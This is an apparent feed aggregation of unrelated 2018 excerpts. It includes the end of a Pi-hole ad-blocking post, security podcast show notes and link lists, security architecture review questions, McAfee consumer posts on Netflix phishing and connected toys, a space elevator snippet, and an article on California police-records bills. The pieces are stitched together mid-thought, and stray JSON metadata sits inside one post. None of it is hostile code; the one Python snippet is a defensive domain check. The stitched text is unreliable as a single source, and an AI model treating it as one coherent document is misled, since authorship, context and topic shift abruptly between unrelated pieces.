It's also flagging a bunch of things I'd like to look at more, for example my wife's laptop being way chattier than everything else:
I haven't looked yet, but if anyone knows the purpose of that microsoft.com domain that continually gets Pi-holed, leave a comment below (I assume it's related to the native Windows 10 mail client). And yes, I'll chat to her about the Fox News situation as well!
I'm yet to have any legit functionality break because of the Pi-hole, but Scott has had to whitelist a couple of domains (literally 2, from memory) such as the Google Analytics dashboard. Of course, it's entirely feasible that legit stuff will break and I myself have gone through troubleshooting pains on behalf of other people before only to then realise that it was their modification of my site that caused the failure. That's always going to be a risk and frankly, that's on me if my choice of tooling breaks something.
So in summary, no compromising devices, no putting your trust in the goodwill of an extension developer, no per-device effort, the bad stuff is blocked and the good stuff still works:
Lastly, Pi-hole has a donate page and this is one of those cases where if you find it as awesome as I have already, you should absolutely show them some love. Cash in some of that time you've reclaimed by not waiting for rubbish ads to load 😎
This week we look at additional changes coming from Google's Chromium team, another powerful instance of newer cross-platform malware, the publication of a 0-day exploit after Microsoft missed its deadline, the return of Sabri Haddouche with browser crash attacks, the reasoning behind Matthew Green's decision to abandon Chrome after a change in release 69... and an "UnGoogled" Chromium alternative that Matthew might approve of, Western Digital's pathetic response to a very serious vulnerability, a cool device exploit collection website, a question about the future of the Internet, a sobering example of the aftermarket in unwiped hard drives, the Mirai Botnet creators are now working with and helping the FBI, another fine levied against Equifax, and a look at Cloudflare's quick move to encrypt a remaining piece of web metadata.
We invite you to read our show notes.
Download or subscribe to this show at https://twit.tv/shows/security-now.
You can submit a question to Security Now! at the GRC Feedback Page.
This edition of the show features Adam Boileau and Patrick Gray discussing the week’s security news:
- Former NSA staffer gets 66 months over incident at heart of Kaspersky scandal
- Zoho has a very bad week
- Telco lobby group raises some legit concerns over Australia’s “anti-encryption” legislation
- Twitter API leaks DMs
- Equifax fined by UK
- Yubikey 5 enables passwordless Windows logins
- Privacy International has an aneurysm
- NSS Labs launches antitrust suit against security software makers
This week’s show is brought to you by Rapid7.
Jen Andre is this week’s sponsor guest. She founded Komand, a security automation and orchestration company that became part of Rapid7 around the middle of last year. I spoke to Jen about how she came to start Komand and where the security automation and orchestration discipline is at right now.
- Ex-NSA employee gets 5.5 years in prison for taking home classified info | ZDNet
- Domain registrar oversteps taking down Zoho domain, impacts over 30Mil users | ZDNet
- Peter Dutton to push through new security legislation as fears of "severely damaging" spyware murmur
- Twitter API bug leaked private data to other accounts
- Equifax fined maximum penalty under 1998 UK data protection law
- The Series 5 YubiKey Will Help Kill the Password | WIRED
- Press release: UK intelligence agency admits unlawfully spying on Privacy International | Privacy International
- UK spooks fess up to snooping on Privacy International's private data
- GCHQ's mass surveillance violates citizens' right to privacy, ECHR rules
- NSS Labs files antitrust suit against multiple cybersecurity vendors
- Hacking for ca$h | The Strategist
- Operator of 'VirusTotal for criminals' gets 14-year prison sentence
- Tencent engineer attending cybersecurity event fined for hotel WiFi hacking
- Snyk gets $22 million for platform that tracks security flaws in open source projects
- They Got 'Everything': Inside a Demo of NSO Group's Powerful iPhone Malware - Motherboard
- Content Moderator Sues Facebook, Says Job Gave Her PTSD - Motherboard
- Microsoft Rolls Out Confidential Computing for Azure
- Cloudflare Improves Privacy by Encrypting the SNI During TLS Negotiation
- This Windows file may be secretly hoarding your passwords and emails | ZDNet
- Security researcher claims macOS Mojave privacy bug on launch day | TechCrunch
- 0Day Windows JET Database Vulnerability disclosed by Zero Day Initiative
- Over 80 Cisco Products Affected by FragmentSmack DoS Bug
- Cisco patches 'critical' credential bug in video surveillance software
- Security Orchestration and Automation with InsightConnect | Rapid7
- Security Orchestration and Automation for Security Operations | Rapid7
- What are its aims/purposes or drivers?
- Where did it spring from? What triggered it? Why now? Why you?
- Is it business-led or IT or infosec or risk or what? Who is behind it? Who stands to benefit or be affected by it? Who are the stakeholders? Are they supportive and engaged, neutral/unaware, or reluctant and disengaged?
- What is it expected to lead into – if anything? Is the outcome entirely open at this point, depending on what the review finds, or are there pencil marks or proposals on the table already, perhaps secret agendas looking for fuses to light?
- What is the scope? Is it meant to be reviewing all of 'security' (whatever that means), or information security, or cybersecurity, or compliance, or strategy, or assurance, or software development security, or information flows, or something else? And why is that - what determines the scope? Why are some things in and others out of scope?
- And, not least, what is ‘security architecture’, or indeed 'architecture', in the specific context of the organization? In some organizations, architecture is central to strategy, making it the domain of senior, experienced managers, who are unlikely to task a clueless underling to review it. To others, it's about blueprints (literally) showing plan and elevation views, and Crime Prevention Through Environmental Design.
If you own a smart TV, or even just a computer, it’s likely you have a Netflix account. The streaming service is huge these days – even taking home awards for its owned content. So, it’s only natural cybercriminals are attempting to leverage the service’s popularity for their own gain. In fact, fake Netflix emails discovered just last week have been circulating, claiming there are issues with users’ accounts. But of course, there is no issue at all – only a phishing scam underway.
The headline in itself should be the first indicator of fraud, as it reads “Update your payment information!” The body of the fake email then claims that there’s an issue with a user’s account or that their account has been suspended. The email states that they need to update their account details in order to resolve the problem, but the link actually leads victims to a genuine-looking Netflix website designed to steal usernames and passwords, as well as payment details. If the victim updates their financial information, they are actually taken to the real Netflix home page, which gives this trick a sense of legitimacy.
In short – this phishing email scheme is convincing and tricky. That means it’s crucial all Netflix users take proactive steps now to protect themselves from this stealthy attack. To do just that, follow these tips:
- Be careful what you click on. Be sure to only click on emails that you are sure came from a trusted source. If you don’t know the sender, or the email’s content doesn’t seem familiar, remain wary and avoid interacting with the message.
- Go directly to the source. It’s a good security rule of thumb: when an email comes through requesting personal info, always go directly to the company’s website to be sure you’re dealing with the real deal. You should be able to check your account status on the Netflix website and determine the legitimacy of the request from there. If anything is still in question, feel free to call Netflix’s support line and ask about the notice that way as well.
- Place a fraud alert. If you know your financial data has been compromised by this attack, be sure to place a fraud alert on your credit so that any new or recent requests undergo scrutiny. It’s important to note that this also entitles you to extra copies of your credit report so you can check for anything sketchy. And if you find an account you did not open, make sure you report it to the police or Federal Trade Commission, as well as the creditor involved so you can put an end to the fraudulent account.
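The "go directly to the source" advice boils down to one check: is the link's host actually the service's registered domain? A toy sketch of that check (the lookalike URL below is invented for illustration):

```python
from urllib.parse import urlparse

LEGIT_DOMAIN = "netflix.com"

def looks_legit(url):
    """Crude check: does the link's host end with the real domain?

    Catches lookalikes such as netflix.com.account-update.example,
    where 'netflix.com' appears in the host but isn't the registered
    domain the browser will actually connect to.
    """
    host = (urlparse(url).hostname or "").lower()
    return host == LEGIT_DOMAIN or host.endswith("." + LEGIT_DOMAIN)

print(looks_legit("https://www.netflix.com/YourAccount"))             # True
print(looks_legit("http://netflix.com.account-update.example/login")) # False
```

Phishers rely on people reading left to right and stopping at the familiar brand name; the part that matters is the rightmost registered domain.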
"author": "Gary Davis",
"category": "Consumer Threat Notices",
"authordetail": "Gary Davis is Chief Consumer Security Evangelist. Through a consumer lens, he partners with internal teams to drive strategic alignment of products with the needs of the security space. Gary also provides security education to businesses and consumers by distilling complex security topics into actionable advice. Follow Gary Davis on Twitter at @garyjdavis",
"pubDate": "Tue 25 Sept 2018 12:35:48 +0000"
The post Netflix Users: Don’t Get Hooked by This Tricky Phishing Email appeared first on McAfee Blogs.
This week, WordPress sites backdoored with malicious code, Google's forced sign in to Chrome raises red flags, Newegg is victimized by Magecart Malware, a Woman hijacked CCTV cameras for Trump's inauguration, Bitcoin DDoS attacks, Cybercriminals target Kodi for Malware, and a Security Researcher is fined for hacking hotel Wifi. Jason Wood joins us for expert commentary on Google Chrome's "dark pattern" of poor privacy changes, on this episode of Hack Naked News!
Full Show Notes: https://wiki.securityweekly.com/HNNEpisode190
Visit https://www.securityweekly.com/hnn for all the latest episodes!
Visit https://www.activecountermeasures.com/hnn to sign up for a demo or buy our AI Hunter!!
→Visit our website: https://www.securityweekly.com
→Follow us on Twitter: https://www.twitter.com/securityweekly
→Like us on Facebook: https://www.facebook.com/secweekly
When people think about IoT devices, many often think of those that fill their homes. Smart lights, ovens, TVs, etc. But there’s a whole other type of IoT devices that are inside the home that parents may not be as cognizant of – children’s toys. In 2018, smartwatches, smart teddy bears, and more are all in kids’ hands. And though parents are happy to purchase the next hot item for their children, they sometimes aren’t fully aware of how these devices can impact their child’s personal security. IoT has expanded to children, but it’s parents that need to understand how these toys affect their family, and what they can do to keep their children protected from an IoT-based cyberthreat.
Now, add IoT into the mix. People are adopting IoT devices for one main reason: convenience. And that’s the same reason these devices have ended up in children’s hands as well. They’re convenient, engaging, easy-to-use toys, some of which are even used to help educate kids.
But this adoption has changed children’s online security. Now, instead of just limiting their device usage and screen time, parents have to start thinking about the types of threats that can emerge from their child’s interaction with IoT devices. For example, smartwatches have been used to track and record kids’ physical location. And children’s data is often recorded with these devices, which means their data could be potentially leveraged for malicious reasons if a cybercriminal breaches the organization behind a specific connected product or app. The FBI has even previously cautioned that these smart toys can be compromised by hackers.
Keeping connected kids safe
Fortunately, there are many things parents can do to keep their connected kids safe. First off, do the homework. Before buying any connected toy or device for a kid, parents should look up the manufacturer first and see if they have security top of mind. If the device has had any issues with security in the past, it’s best to avoid purchasing it. Additionally, always read the fine print. Terms and conditions should outline how and when a company accesses a kid’s data. When buying a connected device or signing them up for an online service/app, always read the terms and conditions carefully in order to remain fully aware of the extent and impact of a kid’s online presence and use of connected devices.
Mind you, these IoT toys must connect to a home Wi-Fi network in order to run. If they’re vulnerable, they could expose a family’s home network as a result. Since it can be challenging to lock down all the IoT devices in a home, utilize a solution like McAfee Secure Home Platform to provide protection at the router-level. Also, parents can keep an eye on their kid’s online interactions by leveraging a parental control solution like McAfee Safe Family. They can know what their kids are up to, guard them from harm, and limit their screen time by setting rules and time limits for apps and websites.
This week, Michael is joined by April Wright to interview Scott King, Sr. Director of Strategic Advisory Services at Rapid 7! In this two part interview, Michael and April talk with Scott about transitioning into his role at Rapid7, ICS Security, the best practices to understand how these systems work, holding accountability, and how legal and security share common goals!
Full Show Notes: https://wiki.securityweekly.com/BSWEpisode100
Visit https://www.securityweekly.com/bsw for all the latest episodes!
Visit https://www.activecountermeasures.com/bsw to sign up for a demo or buy our AI Hunter!!
→Visit our website: https://www.securityweekly.com
→Follow us on Twitter: https://www.twitter.com/securityweekly
→Like us on Facebook: https://www.facebook.com/secweekly
STARS-Me (or Space Tethered Autonomous Robotic Satellite – Mini elevator), built by engineers at Shizuoka University in Japan, comprises two 10-centimeter cubic satellites connected by a 10-meter-long tether. A small robot representing an elevator car, about 3 centimeters across and 6 centimeters tall, will move up and down the cable using a motor as the experiment floats in space.
In November 2014, James De La Rosa was shot and killed by Bakersfield police officers. He was unarmed and 22 years old. Following his death, his family desperately wanted answers. But in California, police misconduct records are generally not available to the public—limiting what the De La Rosa family was able to learn about the officers who killed James.
“One of the officers who was involved in James’s shooting has reportedly also been involved in seven other shootings, while another officer has reportedly been involved in another killing,” James De La Rosa’s mother Leticia said in a statement to the ACLU. “Yet state law shields their records and families like mine rarely get answers to the questions we ask. All we get is secrecy.”
Like Leticia De La Rosa, Theresa Smith had a son killed by California police officers. Caesar Cruz was shot in a Walmart parking lot—allegedly multiple times—by Anaheim police officers before dying in a hospital a half hour later. An attorney for Cruz’ family called his death a “police execution.”
But all the family was allowed to know about Cruz’ death was that five officers were involved, and it took Smith over a year and a half to learn the name of the officer who killed her son.
While police misconduct information is public record in many states, that’s not the case in California. Even when an officer is repeatedly accused of or disciplined for abuse, these records are considered part of an officer’s personnel file.
In the 1970s, Gov. Jerry Brown signed into law a measure that blocked public access to misconduct documents, and forced defendants to petition a judge to examine these records in private and decide if the information warranted disclosure. In 2006, the California Supreme Court ruled that police misconduct investigations are confidential, a ruling that has kept answers from families of people hurt by police violence, obscured critical information about public officials from journalists, and shielded police from scrutiny.
Leticia De La Rosa and Theresa Smith are both advocates for a California bill that could make police investigation and disciplinary records available to the public in particularly egregious instances of misconduct.
“This bill would require, notwithstanding any other law, certain peace officer or custodial officer personnel records and records relating to specified incidents, complaints, and investigations involving peace officers and custodial officers to be made available for public inspection pursuant to the California Public Records Act,” reads California State Senate Bill 1421.
If SB 1421, sponsored by Sen. Nancy Skinner (D-Berkeley), becomes law, personnel records could be released to the public. Journalists would be able to more easily access information, like when officers shoot, kill, commit perjury, sexually assault, lie in an investigation, or seriously injure a citizen.
Some police labor unions have fought the bill fiercely. The California Sheriffs Association argued that the bill could jeopardize officer privacy and create a financial burden on local agencies. Los Angeles Times journalist Liam Dillon noted that the Los Angeles Police Protective League gave the maximum contribution allowable to a dozen Assembly Democrats as they considered the bill.
Despite opposition from police unions, Nikki Moore, legal counsel and legislative advocate at the California News Publishers Association, noted that the California Police Chiefs Association came out in support of the bill. “When they fire an officer and have evidence of misconduct, they can’t tell the public. They saw value in this transparency, and it’s a new perspective.”
SB 1421 has made it to the governor’s desk. It isn’t the only bill awaiting Jerry Brown’s signature that could improve access to police records. Assembly Bill 748 would require police departments to make body camera footage of most officer shootings and serious uses of force publicly available.
In a blog post, California Public Records Act attorney Anna von Herrmann wrote that the bill would open up critical access to records about egregious officer misconduct. “Given the enormous power that law enforcement agencies wield, from the power to arrest and detain individuals to the power to use lethal force, public access to this information could be a powerful tool to understanding and challenging law enforcement abuses.”
The impacts of both bills for transparency could be huge—for families like Cruz’ and De La Rosa’s, community organizers, and journalists reporting on police violence and abuse of power.
“Access to government records is a fundamental principle of democracy,” said Moore. “California, for so long, has denied access to these records, retaining complete discretion over disclosure. You have government agencies acting as editor.”
SB 1421 and AB 748 both await Governor Jerry Brown’s signature. He should sign them both.